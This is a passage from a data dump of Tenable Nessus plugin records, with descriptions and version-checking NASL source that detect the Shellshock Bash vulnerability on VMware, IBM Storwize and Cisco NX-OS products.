\"^7\\.0\\.\")\n{\n fix = \"7.0.2934.111\";\n hotfix = \"7.0.5h1010264\";\n}\nelse if (version =~ \"^7\\.5\\.\")\n{\n fix = \"7.5.3088.112\";\n hotfix = \"7.5.4h1010253\";\n}\nelse if (version =~ \"^7\\.6\\.\")\n{\n fix = \"7.6.3044.119\";\n hotfix = \"7.6.2h1010246\";\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, version);\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) == -1 && hotfix >!< patches)\n{\n port = 0;\n\n if (report_verbosity > 0)\n {\n report = '\\n' + app_name + ' ' + version + ' is missing patch ' + hotfix + '.\\n';\n security_hole(extra:report, port:port);\n }\n else security_hole(port:port);\n exit(0);\n}\nelse audit(AUDIT_PATCH_INSTALLED, hotfix, app_name, version);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T07:39:25", "description": "The VMware vSphere Replication installed on the remote host is version\n5.1.x prior to 5.1.2.2, 5.5.x prior to 5.5.1.3, 5.6.x prior to\n5.6.0.2, or 5.8.x prior to 5.8.0.1. It is, therefore, affected by a\ncommand injection vulnerability in GNU Bash known as Shellshock, which\nis due to the processing of trailing strings after function\ndefinitions in the values of environment variables. This allows a\nremote attacker to execute arbitrary code via environment variable\nmanipulation depending on the configuration of the system", "edition": 27, "published": "2014-10-31T00:00:00", "title": "VMware vSphere Replication Bash Environment Variable Command Injection Vulnerability (VMSA-2014-0010) (Shellshock)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2021-02-02T00:00:00", "cpe": ["x-cpe:/a:vmware:vsphere_replication"], "id": "VMWARE_VSPHERE_REPLICATION_VMSA_2014_0010.NASL", "href": "https://www.tenable.com/plugins/nessus/78771", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78771);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/11/15 20:50:24\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(70103, 70137, 70152, 70154, 70165, 70166);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"EDB-ID\", value:\"34860\");\n script_xref(name:\"VMSA\", value:\"2014-0010\");\n\n script_name(english:\"VMware vSphere Replication Bash Environment Variable Command Injection Vulnerability (VMSA-2014-0010) (Shellshock)\");\n script_summary(english:\"Checks the version of vSphere Replication.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a virtualization appliance installed that is\naffected by Shellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"The VMware vSphere Replication installed on the remote host is version\n5.1.x prior to 5.1.2.2, 5.5.x prior to 5.5.1.3, 5.6.x prior to\n5.6.0.2, or 5.8.x prior to 5.8.0.1. It is, therefore, affected by a\ncommand injection vulnerability in GNU Bash known as Shellshock, which\nis due to the processing of trailing strings after function\ndefinitions in the values of environment variables. This allows a\nremote attacker to execute arbitrary code via environment variable\nmanipulation depending on the configuration of the system\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2014-0010.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to vSphere Replication 5.1.2.2 / 5.5.1.3 / 5.6.0.2 / 5.8.0.1\nor later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:vmware:vsphere_replication\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/VMware vSphere Replication/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"Host/VMware vSphere Replication/Version\");\nverui = get_kb_item_or_exit(\"Host/VMware vSphere Replication/VerUI\");\nbuild = get_kb_item_or_exit(\"Host/VMware vSphere Replication/Build\");\n\nfix = '';\n\nif (version =~ '^5\\\\.1\\\\.' && int(build) < 2170306) fix = '5.1.2 Build 2170306';\nelse if (version =~ '^5\\\\.5\\\\.' && int(build) < 2170307) fix = '5.5.1 Build 2170307';\nelse if (version =~ '^5\\\\.6\\\\.' && int(build) < 2172161) fix = '5.6.0 Build 2172161';\nelse if (version =~ '^5\\\\.8\\\\.' && int(build) < 2170514) fix = '5.8.0 Build 2170514';\n\nif (!empty(fix))\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + verui +\n '\\n Fixed version : ' + fix + \n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, 'VMware vSphere Replication', verui);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T07:39:09", "description": "The version of VMware NSX installed on the remote host is 4.x prior to\n4.0.5 / 4.1.4 / 4.2.1 or 6.x prior to 6.0.7 / 6.1.1. It is, therefore,\naffected by a command injection vulnerability in GNU Bash known as\nShellshock, which is due to the processing of trailing strings after\nfunction definitions in the values of environment variables. This\nallows a remote attacker to execute arbitrary code via environment\nvariable manipulation depending on the configuration of the system.", "edition": 28, "published": "2014-11-03T00:00:00", "title": "VMware NSX Bash Environment Variable Command Injection (VMSA-2014-0010) (Shellshock)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:vmware:nsx"], "id": "VMWARE_NSX_VMSA_2014_0010.NASL", "href": "https://www.tenable.com/plugins/nessus/78826", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78826);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2018/11/15 20:50:24\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"VMSA\", value:\"2014-0010\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"EDB-ID\", value:\"34860\");\n\n script_name(english:\"VMware NSX Bash Environment Variable Command Injection (VMSA-2014-0010) (Shellshock)\");\n script_summary(english:\"Checks the version of VMware NSX.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a command injection vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware NSX installed on the remote host is 4.x prior to\n4.0.5 / 4.1.4 / 4.2.1 or 6.x prior to 6.0.7 / 6.1.1. It is, therefore,\naffected by a command injection vulnerability in GNU Bash known as\nShellshock, which is due to the processing of trailing strings after\nfunction definitions in the values of environment variables. This\nallows a remote attacker to execute arbitrary code via environment\nvariable manipulation depending on the configuration of the system.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2014-0010.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/blogs/766093/posts/1976383\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n # http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e40f2f5a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware NSX version 4.0.5 / 4.1.4 / 4.2.1 / 6.0.7 / 6.1.1 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:nsx\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"vmware_nsx_installed.nbin\");\n script_require_keys(\"Host/VMware NSX/Product\", \"Host/VMware NSX/Version\", \"Host/VMware NSX/Build\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nproduct = get_kb_item_or_exit(\"Host/VMware NSX/Product\");\nversion = get_kb_item_or_exit(\"Host/VMware NSX/Version\");\nbuild = get_kb_item_or_exit(\"Host/VMware NSX/Build\");\nproduct_name = \"VMware NSX \" + product;\n\nfix = '';\n\nif (version =~ '^4\\\\.0\\\\.' && int(build) < '39236') fix = '4.0.5 Build 39236';\nelse if (version =~ '^4\\\\.1\\\\.' && int(build) < '39250') fix = '4.1.4 Build 39250';\nelse if (version =~ '^4\\\\.2\\\\.' && int(build) < '39256') fix = '4.2.1 Build 39256';\nelse if (version =~ '^6\\\\.0\\\\.' && int(build) < '2176282') fix = '6.0.7 Build 2176282';\nelse if (version =~ '^6\\\\.1\\\\.' && int(build) < '2179522') fix = '6.1.1 Build 2179522';\nelse audit(AUDIT_INST_VER_NOT_VULN, product_name, version, build);\n\nreport =\n '\\n Installed product : ' + product_name +\n '\\n Installed version : ' + version + ' Build ' + build +\n '\\n Fixed version : ' + fix + \n '\\n';\nsecurity_report_v4(port:0, extra:report, severity:SECURITY_HOLE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T03:30:42", "description": "The remote IBM Storwize V7000 Unified device is running version 1.3.x\nprior to 1.4.3.5 or 1.5.x prior to 1.5.0.4. It is, therefore, affected\nby the following vulnerabilities :\n\n - A command injection vulnerability exists in GNU Bash\n known as Shellshock. The vulnerability is due to the\n processing of trailing strings after function\n definitions in the values of environment variables.\n This allows a remote attacker to execute arbitrary code\n via environment variable manipulation depending on the\n configuration of the system. (CVE-2014-6271)\n \n - An out-of-bounds memory access error exists in GNU Bash\n in file parse.y due to evaluating untrusted input during\n stacked redirects handling. A remote attacker can exploit\n this, via a crafted 'here' document, to execute arbitrary\n code or cause a denial of service. (CVE-2014-7186)\n\n - An off-by-one error exists in GNU Bash in the\n read_token_word() function in file parse.y when handling\n deeply-nested flow control constructs. A remote attacker\n can exploit this, by using deeply nested loops, to\n execute arbitrary code or cause a denial of service.\n (CVE-2014-7187)\n\n - A command injection vulnerability exists in GNU Bash\n known as Shellshock. The vulnerability is due to the\n processing of trailing strings after function\n definitions in the values of environment variables.\n This allows a remote attacker to execute arbitrary code\n via environment variable manipulation depending on the\n configuration of the system. (CVE-2014-6278) Note that\n this vulnerability exists because of an incomplete fix\n for CVE-2014-6271, CVE-2014-7169, and CVE-2014-6277.", "edition": 27, "published": "2015-08-25T00:00:00", "title": "IBM Storwize V7000 Unified 1.3.x < 1.4.3.5 / 1.5.x < 1.5.0.4 Multiple Vulnerabilities (Shellshock)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:ibm:storwize_v7000_unified_software", "cpe:/h:ibm:storwize_unified_v7000"], "id": "IBM_STORWIZE_1_5_0_4.NASL", "href": "https://www.tenable.com/plugins/nessus/85630", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85630);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/07/12 19:01:16\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70165,\n 70154,\n 70166\n );\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"EDB-ID\", value:\"34860\");\n\n script_name(english:\"IBM Storwize V7000 Unified 1.3.x < 1.4.3.5 / 1.5.x < 1.5.0.4 Multiple Vulnerabilities (Shellshock)\");\n script_summary(english:\"Checks for vulnerable Storwize versions.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote IBM Storwize V7000 Unified device is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote IBM Storwize V7000 Unified device is running version 1.3.x\nprior to 1.4.3.5 or 1.5.x prior to 1.5.0.4. It is, therefore, affected\nby the following vulnerabilities :\n\n - A command injection vulnerability exists in GNU Bash\n known as Shellshock. The vulnerability is due to the\n processing of trailing strings after function\n definitions in the values of environment variables.\n This allows a remote attacker to execute arbitrary code\n via environment variable manipulation depending on the\n configuration of the system. (CVE-2014-6271)\n \n - An out-of-bounds memory access error exists in GNU Bash\n in file parse.y due to evaluating untrusted input during\n stacked redirects handling. A remote attacker can exploit\n this, via a crafted 'here' document, to execute arbitrary\n code or cause a denial of service. (CVE-2014-7186)\n\n - An off-by-one error exists in GNU Bash in the\n read_token_word() function in file parse.y when handling\n deeply-nested flow control constructs. A remote attacker\n can exploit this, by using deeply nested loops, to\n execute arbitrary code or cause a denial of service.\n (CVE-2014-7187)\n\n - A command injection vulnerability exists in GNU Bash\n known as Shellshock. The vulnerability is due to the\n processing of trailing strings after function\n definitions in the values of environment variables.\n This allows a remote attacker to execute arbitrary code\n via environment variable manipulation depending on the\n configuration of the system. (CVE-2014-6278) Note that\n this vulnerability exists because of an incomplete fix\n for CVE-2014-6271, CVE-2014-7169, and CVE-2014-6277.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004898\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to IBM Storwize V7000 Unified version 1.4.3.5 / 1.5.0.4 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:ibm:storwize_unified_v7000\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ibm:storwize_v7000_unified_software\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ibm_storwize_detect.nbin\");\n script_require_keys(\"Host/IBM/Storwize/version\", \"Host/IBM/Storwize/machine_major\", \"Host/IBM/Storwize/display_name\");\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"Host/IBM/Storwize/version\");\nmachine_major = get_kb_item_or_exit(\"Host/IBM/Storwize/machine_major\");\ndisplay_name = get_kb_item_or_exit(\"Host/IBM/Storwize/display_name\");\n\nif (\n machine_major != \"2073\" # V7000 Unified\n) audit(AUDIT_DEVICE_NOT_VULN, display_name);\n\nif (version == UNKNOWN_VER || version == \"Unknown\")\n audit(AUDIT_UNKNOWN_APP_VER, display_name);\n\nif (version =~ \"^1\\.[3-4]\\.\") fix = \"1.4.3.5\";\nelse if (version =~ \"^1\\.5\\.\") fix = \"1.5.0.4\";\nelse audit(AUDIT_DEVICE_NOT_VULN, display_name, version);\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) >= 0)\n audit(AUDIT_DEVICE_NOT_VULN, display_name, version);\n\nif (report_verbosity > 0)\n{\n report =\n '\\n Name : ' + display_name +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n}\nelse security_hole(port:0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T01:36:49", "description": "According to its self-reported version, the remote NX-OS device is\naffected by a command injection vulnerability in GNU Bash known as\nShellshock, which is due to the processing of trailing strings after\nfunction definitions in the values of environment variables. This\nallows a remote attacker to execute arbitrary code via environment\nvariable manipulation depending on the configuration of the system.", "edition": 28, "published": "2014-10-27T00:00:00", "title": "Cisco NX-OS GNU Bash Environment Variable Command Injection Vulnerability (cisco-sa-20140926-bash) (Shellshock)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:cisco:nx-os"], "id": "CISCO-SA-20140926-BASH-NXOS.NASL", "href": "https://www.tenable.com/plugins/nessus/78693", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78693);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/10/29 10:38:39\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur01099\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur04438\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur04510\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur05529\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur05610\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur05017\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCuq98748\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur02102\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur02700\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20140926-bash\");\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n\n script_name(english:\"Cisco NX-OS GNU Bash Environment Variable Command Injection Vulnerability (cisco-sa-20140926-bash) (Shellshock)\");\n script_summary(english:\"Checks the NX-OS version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is running a version of NX-OS that is affected by\nShellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the remote NX-OS device is\naffected by a command injection vulnerability in GNU Bash known as\nShellshock, which is due to the processing of trailing strings after\nfunction definitions in the values of environment variables. This\nallows a remote attacker to execute arbitrary code via environment\nvariable manipulation depending on the configuration of the system.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?df19d2c1\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the suggested fixed version referred to in the relevant\nCisco bug ID. Note that some fixed versions have not been released\nyet. Please contact the vendor for details.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:nx-os\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 Tenable Network Security, Inc.\");\n\n script_dependencies(\"cisco_nxos_version.nasl\");\n script_require_keys(\"Host/Cisco/NX-OS/Version\", \"Host/Cisco/NX-OS/Device\", \"Host/Cisco/NX-OS/Model\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\ndevice = get_kb_item_or_exit(\"Host/Cisco/NX-OS/Device\");\nmodel = get_kb_item_or_exit(\"Host/Cisco/NX-OS/Model\");\nversion = get_kb_item_or_exit(\"Host/Cisco/NX-OS/Version\");\n\nfixed = '';\nbug_ID = '';\n\n# MDS 9000 NX-OS prior to 5.0(8a) / 5.2(8e) / 6.2(9a)\nif (device == 'MDS' && model =~ \"^9[0-9][0-9][0-9]([^0-9]|$)\")\n{\n bug_ID = 'CSCur01099';\n\n if (\n version =~ \"^[2-4]\\.\" ||\n version =~ \"^5\\.0\\([0-7][A-Za-z]?\\)\" ||\n version =~ \"^5\\.0\\(8\\)\"\n ) fixed = '5.0(8a)';\n\n if (\n version =~ \"^5\\.2\\([0-7][A-Za-z]?\\)\" ||\n version =~ \"^5\\.2\\(8[A-Da-d]?\\)\"\n ) fixed = '5.2(8e)';\n\n if (\n version =~ \"^6\\.2\\([0-8][A-Za-z]?\\)\" ||\n version =~ \"^6\\.2\\(9\\)\"\n ) fixed = '6.2(9a)';\n}\n\n# Nexus 1000V, only valid known version affected is 5.2(1)SV3(1.1)\nif (device == 'Nexus' && model =~ \"^1[0-9][0-9][0-9][Vv]$\")\n{\n bug_ID = 'CSCur04438';\n\n if (\n version =~ \"^5\\.2\\(1\\)SV3\\(1\\.1\\)\"\n ) fixed = 'Contact Vendor';\n}\n\n# Nexus 1010, versions affected are 4.2(1)SP1(6.2), and 9.2(1)SP1(4.8)\nif (device == 'Nexus' && model =~ \"^101[0-9]([^0-9]|$)\")\n{\n bug_ID = 'CSCur04510';\n\n if (\n version =~ \"^4\\.2\\(1\\)SP1\\(6\\.2\\)\" ||\n version =~ \"^9\\.2\\(1\\)SP1\\(4\\.8\\)\"\n ) fixed = '5.2(1)SP1(7.2)';\n}\n\n# Nexus 3000 fixed versions 6.0(2)U2(6) / 6.0(2)U3(4) / 6.0(2)U4(2) / 6.0(2)U5(1)\n# Nexus 3500 fixed versions 6.0(2)A3(4) / 6.0(2)A4(2) / 6.0(2)A5(1)\n# The A5 and U5 versions appear to be the first release for those branches.\nif (device == 'Nexus' && model =~ \"^3[0-9][0-9][0-9]([^0-9]|$)\")\n{\n bug_ID = 'CSCur05529';\n\n if (\n version =~ \"^5\\.0\\(3\\)U\" ||\n version =~ \"^6\\.0\\(2\\)U1\\(\" ||\n version =~ \"^6\\.0\\(2\\)U2\\([0-5]\\)\"\n ) fixed = \"6.0(2)U2(6)\";\n\n if (\n version =~ \"^6\\.0\\(2\\)U3\\([0-3]\\)\"\n ) fixed = \"6.0(2)U3(4)\";\n\n if (\n version =~ \"^6\\.0\\(2\\)U4\\([01]\\)\"\n ) fixed = \"6.0(2)U4(2) / 6.0(2)U5(1)\";\n\n if (\n version =~ \"^5\\.0\\(3\\)A\" ||\n version =~ \"^6\\.0\\(2\\)A[12]\\(\" ||\n version =~ \"^6\\.0\\(2\\)A3\\([0-3]\\)\"\n ) fixed = \"6.0(2)A3(4)\";\n\n if (\n version =~ \"^6\\.0\\(2\\)A4\\(1\\)\"\n ) fixed = \"6.0(2)A4(2) / 6.0(2)A5(1)\";\n}\n\n# Nexus 4000 4.1(2)E1(1) known affected release\nif (device == 'Nexus' && model =~ \"^4[0-9][0-9][0-9]([^0-9]|$)\")\n{\n bug_ID = 'CSCur05610';\n\n if (\n version =~ \"^4\\.1\\(2\\)E1\\(1\\)\"\n ) fixed = \"Contact Vendor\";\n}\n\n# Nexus 5000 / 6000, 5.2(1)N1(8a) / 6.0(2)N2(5) / 7.0(3)N1(0.125)\n# 7.0(4)N1(1) / 7.1(0)N1(0.349)\n# Known affected releases\nif (device == 'Nexus' && model =~ \"^56[0-5][0-9][0-9]([^0-9]|$)\")\n{\n bug_ID = 'CSCur05017';\n\n if (\n version =~ \"^5\\.2\\(1\\)N1\\(8a\\)\" ||\n version =~ \"^6\\.0\\(2\\)N2\\(5\\)\" ||\n version =~ 